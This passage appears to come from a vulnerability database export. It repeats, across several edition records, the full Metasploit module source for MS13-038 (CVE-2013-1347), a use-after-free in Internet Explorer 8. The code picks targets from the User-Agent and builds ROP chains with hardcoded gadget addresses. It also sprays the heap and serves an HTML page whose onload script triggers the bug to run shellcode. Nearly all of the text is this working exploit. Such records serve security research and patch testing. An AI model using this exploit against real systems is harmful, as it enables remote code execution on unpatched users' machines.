controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-08-03T21:09:44", "history": [], "viewCount": 85, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-08-03T21:09:44", "differentElements": ["modified", "published"], "edition": 49}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-08-03T23:08:40", "history": [], "viewCount": 85, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-08-03T23:08:40", "differentElements": ["modified", "published"], "edition": 50}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-08-04T03:09:05", "history": [], "viewCount": 86, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-08-04T03:09:05", "differentElements": ["modified", "published"], "edition": 51}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-08-09T13:23:04", "history": [], "viewCount": 86, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += 